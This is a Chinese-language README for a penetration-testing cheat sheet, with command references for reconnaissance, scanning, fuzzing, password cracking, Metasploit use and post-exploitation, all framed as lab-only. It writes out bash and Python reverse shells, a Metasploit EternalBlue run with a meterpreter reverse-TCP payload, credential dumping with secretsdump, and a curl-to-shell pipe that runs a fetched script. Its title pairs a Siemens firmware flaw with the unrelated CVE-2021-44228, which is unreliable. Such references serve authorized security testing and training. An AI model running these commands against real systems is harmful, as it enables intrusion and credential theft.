💀 西门子6Bk1602-0Aa12-0Tp0固件表达式语言注入漏洞利用 CVE-2021-44228
渗透测试与漏洞研究速查表 🛡️
实用的可搜索命令参考,涵盖侦察、扫描、模糊测试、逆向工程和漏洞利用
仅限授权使用 - 适用于教育、防御加固和专业安全测试/实验室环境
🚨 重要:仅限授权使用
请不要对您不拥有的系统或在未获得资产所有者明确书面授权的情况下运行这些命令。滥用是非法且不道德的
目录
- 概述与安全
- 实时演示
- 快速使用
- 速查表(按主题)
- 快速安全与研究总结
- 项目与托管
- 自定义与贡献
- 道德与法律声明
- 许可证
概述与安全
此存储库包含一个紧凑的、以命令为中心的速查表,用于加速授权的渗透测试和漏洞研究。它设计为:
- 完全客户端且便携(单HTML文件选项)
- 易于搜索和复制命令
- 专注于安全、实验室优先的工作流程(隔离PoC,避免生产环境测试)
始终在隔离的VM/容器中测试PoC并保留快照。切勿将漏洞利用PoC或工具暴露给包含生产或敏感系统的网络
实时演示
速查表的轻量级只读演示可用于快速预览:
🔗 实时演示: https://hackerscheatsheet.onrender.com/
演示是速查表的静态客户端预览(HTML/CSS/JS)。仅用于评估和快速共享 - 不要依赖演示获取内部/私有内容。始终按照速查表中的描述在隔离的实验室环境中测试PoC和活动工具
关于内容与安全的说明
- 演示仅托管静态HTML/CSS/JS,没有任何后端扫描或漏洞利用功能
- 对于完整的本地测试,建议克隆存储库并在本地运行
index.html(见下面的快速使用)
快速使用
本地预览(克隆后):
1
2
3
4
5
6
7
8
9
|
git clone [https://github.com/](https://github.com/)/pentest-cheatsheet.git
cd pentest-cheatsheet
# 在浏览器中打开index.html
# macOS
open index.html
# Windows
start index.html
# Linux
xdg-open index.html
|
使用GitHub Pages发布:
- 将存储库推送到GitHub
- 转到Settings → Pages
- 选择主分支和/(根)文件夹
- 保存 - 站点将可用:https://.github.io/pentest-cheatsheet/
速查表(按主题)
注意:仅将example.com、192.0.2.0/24、10.0.0.5和其他占位符替换为真实范围内的目标
1) 侦察与OSINT
1
2
3
4
5
6
7
8
|
# 基本查询
whois example.com
dig +short example.com A
nslookup -type=mx example.com
# OSINT(仅限授权使用)
theharvester -d example.com -b google -l 500
shodan host 1.2.3.4
|
2) 子域名与DNS枚举
1
2
3
4
5
6
7
8
9
10
11
|
# Amass(被动+主动+暴力)
amass enum -d example.com -o amass.txt
# Subfinder(快速被动)
subfinder -d example.com -o subfinder.txt
# crt.sh(通过curl + jq)
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sort -u
# DNS侦察
dnsrecon -d example.com
|
3) 端口与服务发现
1
2
3
4
5
6
7
8
9
|
# Nmap(版本、默认脚本、全端口)
nmap -sC -sV -p- -T4 --min-rate 1000 -oA nmap-full 192.0.2.0/24
# 主机发现
nmap -sn 192.0.2.0/24
# 使用netcat进行横幅抓取
nc -vz 192.0.2.10 80
echo | nc 192.0.2.10 25
|
4) Web发现与模糊测试
1
2
3
4
5
|
# ffuf(目录/文件模糊测试)
ffuf -u https://example.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200,301,302 -o ffuf.json
# gobuster(目录+虚拟主机)
gobuster dir -u https://example.com/ -w /usr/share/wordlists/dirb/common.txt -t 50 -o gobuster.txt
|
5) Web应用程序测试
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
# HTTP快速检查
curl -I -L https://example.com
# nikto(Web服务器检查)
nikto -h https://example.com -output nikto.txt
# sqlmap(仅在范围内和实验室)
sqlmap -u "https://example.com/vuln.php?id=1" --batch --dbs
# XSS测试(仅限实验室)
xsstrike -u "https://example.com/page?param=1"
# 参数发现
arjun -u "https://example.com/page" -o arjun.txt
|
6) 漏洞扫描与SCA
1
2
3
4
5
6
7
8
9
10
11
|
# nuclei(快速模板)
nuclei -l hosts.txt -t cves/ -o nuclei_results.txt
# syft -> 生成SBOM
syft packages dir:./project -o json > sbom.json
# grype -> 扫描SBOM
grype sbom:sbom.json
# 查询NVD(示例)
curl -s "https://services.nvd.nist.gov/rest/json/cve/1.0/CVE-2021-44228" | jq .
|
7) 密码、凭据与AD工具
1
2
3
4
5
6
7
8
9
10
11
12
|
# hydra(在线暴力破解)- 仅限授权
hydra -L users.txt -P passwords.txt -t 4 ssh://192.0.2.10 -o hydra-ssh.txt
# john / hashcat(离线破解)
john --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt
hashcat -m 1000 -a 0 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
# impacket(示例)
python3 /opt/impacket/examples/secretsdump.py domain/USER:PASS -outputfile secrets
# BloodHound收集
Invoke-BloodHound -CollectionMethod All -ZipFileName bloodhound.zip
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
# 启动msfconsole
msfconsole
# 搜索
search cve:2017-0143
search type:exploit platform:windows smb
# 使用漏洞利用
use exploit/windows/smb/ms17_010_eternalblue
# 显示/设置选项
show options
set RHOSTS 192.168.1.0/24
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.5
# 检查(非破坏性)
check
# 漏洞利用(仅限授权/实验室)
exploit
|
9) 后渗透:Shell与枚举
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
# netcat监听器(捕获反向shell)
nc -lvnp 4444
# bash反向shell
bash -i >& /dev/tcp/10.0.0.5/4444 0>&1
# python反向shell
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
# Linux枚举(实验室)
curl -s https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh | sh
# Windows枚举
.\winpeas.exe
|
10) 网络与TLS检查
1
2
3
4
5
6
7
8
9
10
11
|
# tcpdump(捕获)
tcpdump -i eth0 -w capture.pcap -c 1000
# tshark读取
tshark -r capture.pcap -Y "http" -T fields -e http.host -e http.request.uri
# 快速证书信息
openssl s_client -connect example.com:443 /dev/null | openssl x509 -noout -text
# sslyze
sslyze --regular example.com:443
|
11) 漏洞研究与PoC验证
1
2
3
4
5
6
7
8
9
|
# searchsploit
searchsploit "CVE-2021-44228"
searchsploit -m 49993 # 通过EDB ID复制漏洞利用
# 获取PoC(只读)
curl -sL "https://raw.githubusercontent.com/user/repo/branch/poc.py" -o /tmp/poc.py
# 在隔离的无网络容器中运行PoC
docker run --rm -v /tmp/poc.py:/poc/poc.py --network none -it python:3.10 bash -c "python /poc/poc.py"
|
12) 二进制逆向与漏洞开发
1
2
3
4
5
6
7
8
9
10
11
12
13
|
# ELF检查
readelf -h binary
objdump -d binary | less
strings binary
# radare2
r2 -AA binary
# ropgadget
ropgadget --binary binary --only "pop|ret" > gadgets.txt
# gdb + pwndbg
gdb -q ./binary
|
13) 模糊测试
1
2
3
4
5
|
# AFL(插桩二进制文件)
afl-fuzz -i in_dir -o out_dir -- ./target @@
# wfuzz for HTTP
wfuzz -c -z file,/usr/share/wordlists/parameters.txt --hc 404 "https://example.com/vuln?FUZZ=1"
|
14) 移动与固件分析
1
2
3
4
5
6
7
8
9
10
|
# Android反编译/检查
apktool d app.apk -o app_src
jadx -d out app.apk
# frida(动态钩子)- 仅限授权/实验室
frida -U -f com.example.app -l script.js --no-pause
# 固件提取
binwalk -e firmware.bin
strings firmware.bin | grep -i password
|
15) 安全PoC测试与日志记录
1
2
3
4
5
6
7
8
9
10
11
12
|
# 隔离容器(无外部网络)
docker run --rm --network none -v $(pwd):/work -it ubuntu:22.04 bash
# 在容器中启动目标服务(实验室)
docker run --rm -p 8080:80 vuln-app:latest
# 带时间戳和工具版本的日志记录
(tool --version 2>&1 ; date; tool [args]) |& tee logfile.txt
# 尽可能保存JSON
nuclei -o nuclei.json -oJ nuclei.json
ffuf -o ffuf.json -of json
|
快速安全与研究总结
- 隔离测试:始终使用容器、VM和快照进行漏洞利用/PoC测试
- 手动验证:不要盲目信任扫描器输出。手动验证
- 记录一切:CVE ID、供应商公告、受影响版本和测试日志
- 保持合法:在测试前获得明确、书面和当前的授权
项目与托管
- 技术:HTML5 + CSS3(玻璃态效果),Highlight.js用于语法高亮,Vanilla JS用于搜索/复制/导出功能
- 文件结构(简单的单文件选项):
自定义与贡献
- 编辑index.html中的块以添加/删除部分
- 在CDN包含中切换Highlight.js主题
- 在:root下调整颜色变量以即时更改主题
- 欢迎贡献 - 打开PR以添加工具、模板或更安全的工作流程
建议的提交与PR
提交消息:
示例git命令:
1
2
3
4
5
6
|
git checkout -b feat/add-live-demo
git push origin feat/add-live-demo
# 在GitHub上从feat/add-live-demo -> main打开PR
|
道德与法律声明
此项目仅用于授权的渗透测试、实验室模拟和防御训练。作者对滥用不承担任何责任。您应对自己的行为负责
通过使用此速查表,您确认理解并将遵守适用法律,并在进行任何主动测试前获得适当授权
许可证
MIT许可证
版权所有(c)